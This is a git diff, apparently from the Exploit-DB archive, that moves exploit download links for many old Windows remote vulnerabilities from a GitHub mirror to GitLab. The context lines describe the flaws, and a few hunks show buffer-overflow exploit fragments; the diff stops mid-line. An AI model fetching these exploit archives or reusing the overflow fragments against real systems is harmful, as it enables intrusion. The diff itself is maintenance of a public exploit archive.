@@ -16,4 +16,4 @@ Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue. The worm Nimda(and variants) actively exploit this vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20841.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20841.zip \ No newline at end of file diff --git a/exploits/windows/remote/20842.txt b/exploits/windows/remote/20842.txt index 04b5d7095..61f4b7384 100644 --- a/exploits/windows/remote/20842.txt +++ b/exploits/windows/remote/20842.txt @@ -16,4 +16,4 @@ Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue. The worm Nimda(and variants) actively exploit this vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20842.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20842.tgz \ No newline at end of file diff --git a/exploits/windows/remote/21169.txt b/exploits/windows/remote/21169.txt index 8f22e1528..1b9c9d8c2 100644 --- a/exploits/windows/remote/21169.txt +++ b/exploits/windows/remote/21169.txt @@ -8,4 +8,4 @@ Exploitation will result in a violation of security policy. Tiny Personal Firewall, ZoneAlarm and ZoneAlarm Pro are confirmed vulnerable. It is believed that other applications similar in design may also be vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21169.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21169.zip \ No newline at end of file diff --git a/exploits/windows/remote/21196.txt b/exploits/windows/remote/21196.txt index d20d2b7a9..2e884c13f 100644 --- a/exploits/windows/remote/21196.txt +++ b/exploits/windows/remote/21196.txt @@ -8,4 +8,4 @@ It is important to note that there is currently no way for an AIM user to block **AOL has made modifications to their AIM servers to prevent this vulnerability from being exploited through their servers. However, the underlying problem still exists in the client software which could still be exploited using something similar to a man in the middle attack or if an attacker can bypass the filters on the AIM servers. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21196.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21196.tgz \ No newline at end of file diff --git a/exploits/windows/remote/21199.txt b/exploits/windows/remote/21199.txt index 7ab755c10..f07e4c3fe 100644 --- a/exploits/windows/remote/21199.txt +++ b/exploits/windows/remote/21199.txt @@ -4,4 +4,4 @@ Microsoft Internet Explorer is prone to a vulnerability which may disclose sensi When script code includes a file outside of the document it is embedded in and the file does not exist, the onError event handler will run script if it is enabled. This script can determine whether the file to be included exists or not. This can be used to verify the existence of files on client hosts by creating webpages that include files from the local host using 'file://'. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21199.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21199.zip \ No newline at end of file diff --git a/exploits/windows/remote/21542.c b/exploits/windows/remote/21542.c index d36a07d86..d8edf2075 100644 --- a/exploits/windows/remote/21542.c +++ b/exploits/windows/remote/21542.c @@ -148,4 +148,4 @@ void sock_err(int err) { } -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21542.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21542.exe \ No newline at end of file diff --git a/exploits/windows/remote/21618.txt b/exploits/windows/remote/21618.txt index 7ab57c56e..467d27855 100644 --- a/exploits/windows/remote/21618.txt +++ b/exploits/windows/remote/21618.txt @@ -4,4 +4,4 @@ ICQ is an instant messenger client for Microsoft Windows systems. ICQ includes s Reportedly, it is possible for a remote party to modify sound settings in ICQ by forcing a vulnerable user to access a blank .scm file. Allegedly, this may be done if the user views maliciously formatted HTML under some browsers. The HTML must reference a sound scheme file within an IFRAME tag. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21618.scm \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21618.scm \ No newline at end of file diff --git a/exploits/windows/remote/21631.txt b/exploits/windows/remote/21631.txt index 3e0c9ef1b..d89169d74 100644 --- a/exploits/windows/remote/21631.txt +++ b/exploits/windows/remote/21631.txt @@ -6,4 +6,4 @@ When including a certain string of characters between the filename and the actua The end result is that an attacker is able to entice a user to open or save files of arbitrary types to their local system. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21631.eml \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21631.eml \ No newline at end of file diff --git a/exploits/windows/remote/21648.txt b/exploits/windows/remote/21648.txt index eb86a1803..0dd818536 100644 --- a/exploits/windows/remote/21648.txt +++ b/exploits/windows/remote/21648.txt @@ -6,4 +6,4 @@ Reportedly, Pegasus is vulnerable to a buffer overflow condition when processing This issue has been reported in Pegasus Mail 4.01. Earlier versions may share this vulnerability, this has not however been confirmed. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21648.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21648.zip \ No newline at end of file diff --git a/exploits/windows/remote/21692.txt b/exploits/windows/remote/21692.txt index 88ab6b47f..a55565b12 100644 --- a/exploits/windows/remote/21692.txt +++ b/exploits/windows/remote/21692.txt @@ -16,4 +16,4 @@ This vulnerability also exists in some versions of KDE and the included Konquero ** UPDATE 11/11/03 - Microsoft has updated their bulletin for this issue. Users who installed Internet Explorer 6 after installing Windows 2000 Service Pack 4 may have reintroduced this issue onto their systems. A new patch is available for users who installed Internet Explorer 6 on Windows 2000 SP4 systems. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21692.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21692.tar.gz \ No newline at end of file diff --git a/exploits/windows/remote/21902.c b/exploits/windows/remote/21902.c index f60460be7..0ca0ba807 100644 --- a/exploits/windows/remote/21902.c +++ b/exploits/windows/remote/21902.c @@ -132,4 +132,4 @@ int main(int argc, char ** argv) *(int*)pCode = addr ? addr : 0x77e79d02; *(pCode+4)=0; printf("%s%s%s",prefix,buff,postfix); -} +} \ No newline at end of file diff --git a/exploits/windows/remote/21913.txt b/exploits/windows/remote/21913.txt index 20d68f627..e0c30361b 100644 --- a/exploits/windows/remote/21913.txt +++ b/exploits/windows/remote/21913.txt @@ -6,4 +6,4 @@ It is possible for an attacker to obtain information regarding Published Applica By bruteforcing a Citrix Published Applications list, it may be possible for an attacker to launch further attacks. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21913.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21913.tar.gz \ No newline at end of file diff --git a/exploits/windows/remote/22022.txt b/exploits/windows/remote/22022.txt index 09aff6344..87733eb47 100644 --- a/exploits/windows/remote/22022.txt +++ b/exploits/windows/remote/22022.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow a remote attacker to redirect program flow to ma This vulnerability was discovered in Macromedia Flash ActiveX 6.0.47. It is not yet known if earlier versions are affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22022.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22022.zip \ No newline at end of file diff --git a/exploits/windows/remote/22027.txt b/exploits/windows/remote/22027.txt index c93f75ac7..9f60c01c9 100644 --- a/exploits/windows/remote/22027.txt +++ b/exploits/windows/remote/22027.txt @@ -6,8 +6,8 @@ An applet constructed at the bytecode-level may be able to perform some illegal Code execution with the privileges of the victim user may be possible. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22027-1.tar.gz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22027-1.tar.gz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22027-2.tar.gz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22027-2.tar.gz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22027-3.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22027-3.tar.gz \ No newline at end of file diff --git a/exploits/windows/remote/22028.txt b/exploits/windows/remote/22028.txt index 2f7654081..52ce04b45 100644 --- a/exploits/windows/remote/22028.txt +++ b/exploits/windows/remote/22028.txt @@ -6,4 +6,4 @@ If a malicous applet is compiled by the vulnerable compiler, it may be possible Successful execution of attacker-supplied instructions may result in arbitrary system commands being executed outside of the Java sandbox, with privileges of the JVM process. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22028.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22028.tar.gz \ No newline at end of file diff --git a/exploits/windows/remote/22194.txt b/exploits/windows/remote/22194.txt index e0cb4893a..9b420f342 100644 --- a/exploits/windows/remote/22194.txt +++ b/exploits/windows/remote/22194.txt @@ -4,4 +4,4 @@ It has been reported that the Microsoft Windows Locator service is affected by a This vulnerability may be exploited by remote attackers to execute custom instructions on the target server. It is also possible to crash the service with a malicious request. It should be noted that, to exploit this vulnerability, no authentication is required. Additionally, the Locator service is enabled by default on all Windows 2000 and Windows NT Domain Controllers (DC). -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22194.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22194.zip \ No newline at end of file diff --git a/exploits/windows/remote/22288.txt b/exploits/windows/remote/22288.txt index 3dad5df16..5d40a3a12 100644 --- a/exploits/windows/remote/22288.txt +++ b/exploits/windows/remote/22288.txt @@ -4,6 +4,6 @@ Microsoft Internet Explorer contains a vulnerability that can allow script code There have been reports that some users may not be able to reproduce this vulnerability. When more information becomes available, this record will be updated. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22288-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22288-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22288-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22288-2.zip \ No newline at end of file diff --git a/exploits/windows/remote/22338.txt b/exploits/windows/remote/22338.txt index 6fa28be87..00bde94ad 100644 --- a/exploits/windows/remote/22338.txt +++ b/exploits/windows/remote/22338.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/7044/info Clearswift MailSweeper does not properly process certain malformed MIME email message attachments. If the attachment does not contain a MIME-Version field, MailSweeper does not recognize the attachment as being an executable type. MailSweeper allows such attachments through, even if it is set to filter executable type file attachments from incoming email messages. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22338.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22338.zip \ No newline at end of file diff --git a/exploits/windows/remote/22341.txt b/exploits/windows/remote/22341.txt index e2dc74519..4cc44eb9b 100644 --- a/exploits/windows/remote/22341.txt +++ b/exploits/windows/remote/22341.txt @@ -8,4 +8,4 @@ Successful exploitation of this issue may allow an attacker to execute arbitrary It should be noted that this issue is limited to files that are displayed in the 'Download Dialog'. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22341.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22341.tgz \ No newline at end of file diff --git a/exploits/windows/remote/22367.txt b/exploits/windows/remote/22367.txt index 42cf4b4ab..63f1c18fe 100644 --- a/exploits/windows/remote/22367.txt +++ b/exploits/windows/remote/22367.txt @@ -14,4 +14,4 @@ Several other library functions which call the vulnerable ntdll.dll procedure ha ** It has been reported that the W32.Welchia.Worm, described in MCID 1811, is actively exploiting this vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22367.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22367.zip \ No newline at end of file diff --git a/exploits/windows/remote/22368.txt b/exploits/windows/remote/22368.txt index 9228910a9..fff3a2ed2 100644 --- a/exploits/windows/remote/22368.txt +++ b/exploits/windows/remote/22368.txt @@ -12,4 +12,4 @@ Several other library functions which call the vulnerable ntdll.dll procedure ha ** It has been reported that the W32.Welchia.Worm, described in MCID 1811, is actively exploiting this vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22368.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22368.tar.gz \ No newline at end of file diff --git a/exploits/windows/remote/22575.txt b/exploits/windows/remote/22575.txt index 37d801e72..454150bc5 100644 --- a/exploits/windows/remote/22575.txt +++ b/exploits/windows/remote/22575.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/7539/info Internet Explorer is reported to be vulnerable to a zone bypass issue. Allegedly, if Internet Explorer attempts to open a web page containing numerous 'file://' requests each contained in a separate Iframe, the requested file will eventually be executed in the Local Computer zone. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22575.rar (dmz.rar Password: zones) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22575.rar (dmz.rar Password: zones) \ No newline at end of file diff --git a/exploits/windows/remote/22726.txt b/exploits/windows/remote/22726.txt index a285e0f4e..6e1492af0 100644 --- a/exploits/windows/remote/22726.txt +++ b/exploits/windows/remote/22726.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/7806/info Microsoft Internet Explorer is prone to a boundary condition error when handling OBJECT tags in web pages. When a web page containing an OBJECT tag using a parameter containing excessive data is encountered by a vulnerable client, a internal memory buffer will be overrun. This could cause Internet Explorer to fail or potentially result in the execution arbitrary code in the security context of the current user. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22726.tar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22726.tar \ No newline at end of file diff --git a/exploits/windows/remote/22872.txt b/exploits/windows/remote/22872.txt index 9405b68d8..3d288cd09 100644 --- a/exploits/windows/remote/22872.txt +++ b/exploits/windows/remote/22872.txt @@ -7,4 +7,4 @@ The issue likely presents itself due do a lack of sufficient bounds checking per It should be noted that although this vulnerability has been reported to affect IglooFTP PRO version 3.8, other versions might also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22872.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22872.zip \ No newline at end of file diff --git a/exploits/windows/remote/22917.txt b/exploits/windows/remote/22917.txt index babef53d7..cf5820055 100644 --- a/exploits/windows/remote/22917.txt +++ b/exploits/windows/remote/22917.txt @@ -6,4 +6,4 @@ This issue may be exposed on other ports that the RPC Endpoint Mapper listens on ** There have been unconfirmed reports that Windows 9x systems with certain software installed may also be vulnerable to this issue. Reportedly, Windows 98 systems with .NET software installed may be vulnerable according to scans using various DCOM RPC vulnerability scanning tools. Symantec has not confirmed this behaviour and it may in fact be due to false positives generated by the scanners. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22917.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22917.zip \ No newline at end of file diff --git a/exploits/windows/remote/22967.txt b/exploits/windows/remote/22967.txt index fa883f7d3..ab1e64cbf 100644 --- a/exploits/windows/remote/22967.txt +++ b/exploits/windows/remote/22967.txt @@ -4,4 +4,4 @@ Half-Life Client has been reported prone to a remotely exploitable buffer overfl The issue presents itself in the client connection routine, used by the client to negotiate a connection to the Half-Life game server. Due to a lack of sufficient bounds checking performed on both the parameter and value of data transmitted from the game server to the client, a malicious server may execute arbitrary code on an affected client. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22967.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22967.zip \ No newline at end of file diff --git a/exploits/windows/remote/23034.txt b/exploits/windows/remote/23034.txt index 4b67248f0..956ee4715 100644 --- a/exploits/windows/remote/23034.txt +++ b/exploits/windows/remote/23034.txt @@ -6,4 +6,4 @@ When the vulnerable configuration is in place, an attacker may be capable of enu The enumeration of this type of information could potentially aid an attacker when launching further attacks against the target web server. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23034.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23034.tar.gz \ No newline at end of file diff --git a/exploits/windows/remote/23073.txt b/exploits/windows/remote/23073.txt index bee0e46c1..186fed173 100644 --- a/exploits/windows/remote/23073.txt +++ b/exploits/windows/remote/23073.txt @@ -9,7 +9,7 @@ The exploit is mirrored at the farlight website http://www.farlight.org. Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday All owned By Kingcope -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23073.tar.gz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23073.tar.gz Installation Instructions ============================= diff --git a/exploits/windows/remote/23079.txt b/exploits/windows/remote/23079.txt index da8397805..07d507f4c 100644 --- a/exploits/windows/remote/23079.txt +++ b/exploits/windows/remote/23079.txt @@ -3,7 +3,7 @@ Discovered & Exploited By Kingcope Year 2011 -- -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23079.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23079.zip Example banner: WeOnlyDo-wodFTPD 2.3.6.165 diff --git a/exploits/windows/remote/23080.txt b/exploits/windows/remote/23080.txt index 21ff3d21a..b078612df 100644 --- a/exploits/windows/remote/23080.txt +++ b/exploits/windows/remote/23080.txt @@ -2,7 +2,7 @@ FreeSSHD all version Remote Authentication Bypass ZERODAY Discovered & Exploited by Kingcope Year 2011 -# Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23080.zip +# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23080.zip Run like: diff --git a/exploits/windows/remote/23083.txt b/exploits/windows/remote/23083.txt index 1d69705a5..3f4c92be7 100644 --- a/exploits/windows/remote/23083.txt +++ b/exploits/windows/remote/23083.txt @@ -3,7 +3,7 @@ Version 1.0 By Kingcope In the Year of 2012 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23083.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23083.zip use this on a fast scan server! diff --git a/exploits/windows/remote/23131.txt b/exploits/windows/remote/23131.txt index 8b8c8aaab..c0d12447c 100644 --- a/exploits/windows/remote/23131.txt +++ b/exploits/windows/remote/23131.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/8577/info Multiple issues have been reported in Microsoft Internet Explorer. Though these issues have been reported by a reliable source, communication issues have presented difficulty in obtaining details surrounding the reported issues. This vulnerability entry will be updated when additional information becomes available. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23131.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23131.zip \ No newline at end of file diff --git a/exploits/windows/remote/23198.txt b/exploits/windows/remote/23198.txt index 5389cf346..b977ba20e 100644 --- a/exploits/windows/remote/23198.txt +++ b/exploits/windows/remote/23198.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/8730/info It has been reported that Half-Life clients may be prone to a format string vulnerability. The problem occurs when an invalid command is issued to the server, and an error response is returned and displayed by the client. If a format specifier were included within the invalid command, when displaying the error the format specifier would be interperted literally. This could potentially be exploited by a remote attacker to execute arbitrary code with the privileges of the Half-Life client. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23198.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23198.zip \ No newline at end of file diff --git a/exploits/windows/remote/23283.txt b/exploits/windows/remote/23283.txt index 7fa07eaaf..a88b94402 100644 --- a/exploits/windows/remote/23283.txt +++ b/exploits/windows/remote/23283.txt @@ -6,4 +6,4 @@ This could aid in exploitation of other vulnerabilities, such as issues that per Liu Die Yu has released conflicting information that states that this issue occurs because the user is redirected into a local resource and then the local resource is being refreshed. It is reported that other variations such as "file://" or "[DriveLetter]:\[...]" also work with this exploit. This is currently under investigation. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23283.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23283.zip \ No newline at end of file diff --git a/exploits/windows/remote/23340.txt b/exploits/windows/remote/23340.txt index b9f3f82aa..1fcc7a646 100644 --- a/exploits/windows/remote/23340.txt +++ b/exploits/windows/remote/23340.txt @@ -8,6 +8,6 @@ The extra slash prior to "Documents and Settings" will cause the referenced cont ** A new proof-of-concept has been made available which uses the vulnerability described in BID 9106 to locate the Internet Explorer cache. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23340-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23340-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23340-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23340-2.zip \ No newline at end of file diff --git a/exploits/windows/remote/23400.txt b/exploits/windows/remote/23400.txt index 005d8a9b9..0db27c814 100644 --- a/exploits/windows/remote/23400.txt +++ b/exploits/windows/remote/23400.txt @@ -8,4 +8,4 @@ According to Microsoft, Microsoft Internet Explorer on Windows Server 2003 is pr Microsoft Windows platforms running Microsoft Outlook Express 5.5SP2, 6.0, and 6.0SP1 are reported by the vendor to be affected though the issue may also be present in earlier versions of Microsoft Outlook Express. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23400.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23400.zip \ No newline at end of file diff --git a/exploits/windows/remote/23401.txt b/exploits/windows/remote/23401.txt index 47f4dbf1c..04bd1d95b 100644 --- a/exploits/windows/remote/23401.txt +++ b/exploits/windows/remote/23401.txt @@ -8,4 +8,4 @@ According to Microsoft, Microsoft Internet Explorer on Windows Server 2003 is pr Microsoft Windows platforms running Microsoft Outlook Express 5.5SP2, 6.0, and 6.0SP1 are reported by the vendor to be affected though the issue may also be present in earlier versions of Microsoft Outlook Express. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23401.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23401.zip \ No newline at end of file diff --git a/exploits/windows/remote/23423.txt b/exploits/windows/remote/23423.txt index 83a2aca6e..8d78e9b6a 100644 --- a/exploits/windows/remote/23423.txt +++ b/exploits/windows/remote/23423.txt @@ -4,4 +4,4 @@ A weakness has been reported in multiple browsers that may allow attackers to ob An attacker could exploit this issue by supplying a malicious URI pointing to a page designed to mimic that of a trusted site, and tricking a victim who follows a link into believing they are actually at the trusted location. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23423.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23423.zip \ No newline at end of file diff --git a/exploits/windows/remote/23489.txt b/exploits/windows/remote/23489.txt index 654f8a190..67fe41cda 100644 --- a/exploits/windows/remote/23489.txt +++ b/exploits/windows/remote/23489.txt @@ -4,4 +4,4 @@ A vulnerability has been reported to affect Sygate Personal Firewall that may al A local attacker may exploit this condition to bypass Sygate DLL authentication controls. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23489.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23489.zip \ No newline at end of file diff --git a/exploits/windows/remote/23493.txt b/exploits/windows/remote/23493.txt index 9360e0a84..50dffa9ca 100644 --- a/exploits/windows/remote/23493.txt +++ b/exploits/windows/remote/23493.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/9316/info Jordan Windows Telnet Server has been reported prone to a remote buffer overrun vulnerability. The issue has been reported to present itself when a username of excessive length is supplied to the Telnet server. Due to a lack of bounds checking, when this username is copied into an insufficient reserved buffer in stack-based memory, data that exceeds the size of the buffer will overrun its bounds and corrupt adjacent memory. An attacker may exploit this condition to corrupt a saved instruction pointer for the vulnerable function. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23493.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23493.zip \ No newline at end of file diff --git a/exploits/windows/remote/23734.c b/exploits/windows/remote/23734.c index 79b0228d6..0e64071f2 100644 --- a/exploits/windows/remote/23734.c +++ b/exploits/windows/remote/23734.c @@ -141,6 +141,4 @@ int main( int argc, char *argv[] ) return(0); -} - - +} \ No newline at end of file diff --git a/exploits/windows/remote/23758.txt b/exploits/windows/remote/23758.txt index 63e4a177f..846a13b53 100644 --- a/exploits/windows/remote/23758.txt +++ b/exploits/windows/remote/23758.txt @@ -4,4 +4,4 @@ It has been reported that GWeb is prone to a directory traversal vulnerability. This issue may allow an attacker to escape the web server root directory and view any web server readable files. Information acquired by exploiting this issue may be used to aid further attacks against a vulnerable system. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23758.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23758.zip \ No newline at end of file diff --git a/exploits/windows/remote/24017.html b/exploits/windows/remote/24017.html index 3140f57a6..b24e33e6c 100644 --- a/exploits/windows/remote/24017.html +++ b/exploits/windows/remote/24017.html @@ -11,7 +11,7 @@ ** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb ** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php ** Tested on Windows 7 (x86) - IE 8.0.7601.17514 -** Old version of the exploit available at: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24017-old.zip +** Old version of the exploit available at: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24017-old.zip #################################################################### diff --git a/exploits/windows/remote/24125.txt b/exploits/windows/remote/24125.txt index 8d1df6097..3a4a796bb 100644 --- a/exploits/windows/remote/24125.txt +++ b/exploits/windows/remote/24125.txt @@ -6,4 +6,4 @@ This vulnerability poses a security risk since users assume that opening a folde The reporter of this issue has provided a proof-of-concept exploit that executes NetMeeting and installs a keylogger on a vulnerable system. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24125.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24125.zip \ No newline at end of file diff --git a/exploits/windows/remote/24653.txt b/exploits/windows/remote/24653.txt index fdad98722..d9e2d5d05 100644 --- a/exploits/windows/remote/24653.txt +++ b/exploits/windows/remote/24653.txt @@ -4,4 +4,4 @@ VyPRESS Messenger is affected by a remote buffer overflow vulnerability. This is An attacker may leverage this issue to remotely execute arbitrary machine code on an affected computer with the privileges of the user running the affected application. It is possible to exploit all hosts on a local area network by sending a message to a broadcast address. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24653.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24653.zip \ No newline at end of file diff --git a/exploits/windows/remote/24693.txt b/exploits/windows/remote/24693.txt index b1a4ca6b0..1c094a00a 100644 --- a/exploits/windows/remote/24693.txt +++ b/exploits/windows/remote/24693.txt @@ -4,4 +4,4 @@ The Microsoft cumulative Internet Explorer patch (MS04-038) attempted to limit w However, a number of file types are still permitted for drag and drop operations. It has demonstrated that it is possible to embed hostile HTML and script code in one of these file types, remove the file extension and then allow the operating system to dynamically determine the file type based on its contents. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24693.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24693.zip \ No newline at end of file diff --git a/exploits/windows/remote/24767.txt b/exploits/windows/remote/24767.txt index 607dc573f..afac963bb 100644 --- a/exploits/windows/remote/24767.txt +++ b/exploits/windows/remote/24767.txt @@ -4,4 +4,4 @@ It is reported that Soldier of Fortune 2 is susceptible to a buffer overflow vul A remote attacker may exploit this vulnerability to deny service to legitimate users. Due to the nature of this vulnerability, it is conjectured that remote code execution may be possible, but this is not confirmed. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24767.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24767.zip \ No newline at end of file diff --git a/exploits/windows/remote/24958.py b/exploits/windows/remote/24958.py index bf90a543b..f6383d9cd 100755 --- a/exploits/windows/remote/24958.py +++ b/exploits/windows/remote/24958.py @@ -40,4 +40,4 @@ buf = "GET /" + junk + ret + " HTTP/1.1\r\n" + "Host: " + host + "\r\n\r\n" print "[+] sending buffer size", len(buf) s = 